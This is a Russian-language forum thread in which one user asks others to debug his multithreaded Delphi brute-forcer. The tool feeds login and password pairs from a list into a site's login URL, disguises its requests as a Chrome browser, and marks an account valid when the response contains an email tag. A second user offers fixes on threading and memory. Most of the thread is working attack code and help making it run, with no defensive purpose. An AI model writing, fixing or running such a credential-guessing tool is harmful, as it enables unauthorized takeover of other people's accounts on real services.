[Подсказка] Брутфорс в url

MastaDan · 19.10.2012, 23:46

Всем привет.
Столкнулся с проблемой.
Брут перебирает логины и пассы по линку
Пример(Get):
HTTP.Get('https://blabla.net/loginregist/login='+FAcc+'&pass='+FPas);

Замаскировался под браузер

Код:

   HTTP.Request.UserAgent:= 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4';
     Http.Request.Host:='blabla.net';
     Http.Request.Accept:='text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5';
     Http.Request.AcceptCharSet:='windows-1251,utf-8;q=0.7,*;q=0.7';
     Http.Request.AcceptEncoding:='gzip,deflate, identity';
     Http.Request.AcceptLanguage:='ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3';

Проверку сделал по ResponseCode (200 = сайт валид осылает)
// if http.ResponseCode<>200 then
и пробовал по поиску строки в коде
if Pos('<Email>',Link)<>0 then

Странно то что он все пихает в бед, снифер его даже не ловит запросы.
Что я где накасячил ?

Отрывок кода.

Код:

 begin
     FAcc:= Copy(Accounts[CurAcc],1,Pos(';',Accounts[CurAcc])-1);
     FPas:= Copy(Accounts[CurAcc],Pos(';',Accounts[CurAcc])+1,Length(Accounts[CurAcc]));

     data:=Tstringlist.create;
     data.Add('login='+FAcc);
     data.Add('password='+FPas);
     HTTP:=TIdHTTP.create;
     HTTP.HandleRedirects:=false;
     HTTP.Request.UserAgent:= 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4';
     Http.Request.Host:='blabla.net';
     Http.Request.Accept:='text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5';
     Http.Request.AcceptCharSet:='windows-1251,utf-8;q=0.7,*;q=0.7';
     Http.Request.AcceptEncoding:='gzip,deflate, identity';
     Http.Request.AcceptLanguage:='ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3';
      try
        Link:=HTTP.Get('https://blabla.net/loginregist/login='+FAcc+'&pass='+FPas);
      Rez:=-1;
     except
        if Pos('<Email>',Link)<>0 then
     // if http.ResponseCode<>200then

Прошу сильно не пинать, первый раз столкнулся с написание брута, которые подставляет в url лог и пасс.

Касяк то что это Get ?
С ним как с Post запросом уже не "зафигачить" ?

metraz · 19.10.2012, 23:53

Сей код так понимаю в цикле? Данного куска куда недостаточно чтоб понять. Возможно дело в data.free, которого в данном коде нет.

MastaDan · 19.10.2012, 23:55

Код:

procedure TNewThread.Execute;
var CurAcc:integer;
    data:Tstringlist;
    HTTP: TIdHTTP;
    Link: String;
begin
 while Work do
  begin
   CS.Enter;
   Inc(Acc);
   if Acc<Accounts.Count then CurAcc:=Acc else Work:=false;
   CS.Leave;

   if Work then
begin
     FAcc:= Copy(Accounts[CurAcc],1,Pos(';',Accounts[CurAcc])-1);
     FPas:= Copy(Accounts[CurAcc],Pos(';',Accounts[CurAcc])+1,Length(Accounts[CurAcc]));

     data:=Tstringlist.create;
     data.Add('login='+FAcc);
     data.Add('password='+FPas);
     HTTP:=TIdHTTP.create;
     HTTP.HandleRedirects:=false;
     HTTP.Request.UserAgent:= 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4';
     Http.Request.Host:='blabla.net';
     Http.Request.Accept:='text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5';
     Http.Request.AcceptCharSet:='windows-1251,utf-8;q=0.7,*;q=0.7';
     Http.Request.AcceptEncoding:='gzip,deflate, identity';
     Http.Request.AcceptLanguage:='ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3';
      try
        Link:=HTTP.Get('https://blabla.net/loginregist/login='+FAcc+'&pass='+FPas);
      Rez:=-1;
     except
        if Pos('<Email>',Link)<>0 then
     // if http.ResponseCode<>200then
Rez:=1
      else

       Rez:=-1;
     end;
     HTTP.Free;
     data.Free;

     Synchronize(Sync);
    end;
  end;
end;

metraz · 20.10.2012, 00:23

Цитата:

Сообщение от MastaDan

Код:

procedure TNewThread.Execute; var CurAcc:integer; data:Tstringlist; HTTP: TIdHTTP; Link: String; begin while Work do begin CS.Enter; Inc(Acc); if Acc<Accounts.Count then CurAcc:=Acc else Work:=false; CS.Leave; if Work then begin FAcc:= Copy(Accounts[CurAcc],1,Pos(';',Accounts[CurAcc])-1); FPas:= Copy(Accounts[CurAcc],Pos(';',Accounts[CurAcc])+1,Length(Accounts[CurAcc])); data:=Tstringlist.create; data.Add('login='+FAcc); data.Add('password='+FPas); HTTP:=TIdHTTP.create; HTTP.HandleRedirects:=false; HTTP.Request.UserAgent:= 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4'; Http.Request.Host:='blabla.net'; Http.Request.Accept:='text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'; Http.Request.AcceptCharSet:='windows-1251,utf-8;q=0.7,*;q=0.7'; Http.Request.AcceptEncoding:='gzip,deflate, identity'; Http.Request.AcceptLanguage:='ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3'; try Link:=HTTP.Get('https://blabla.net/loginregist/login='+FAcc+'&pass='+FPas); Rez:=-1; except if Pos('<Email>',Link)<>0 then // if http.ResponseCode<>200then Rez:=1 else Rez:=-1; end; HTTP.Free; data.Free; Synchronize(Sync); end; end; end;

Если брут многопоточный, то лучше использовать не synhonize а критические секции. Но это мое мнение. Либо сменить инди на синапс)

MastaDan · 20.10.2012, 00:27

В синапсе я вообще не але)
Интересно почему снифер его даже не ловит х_х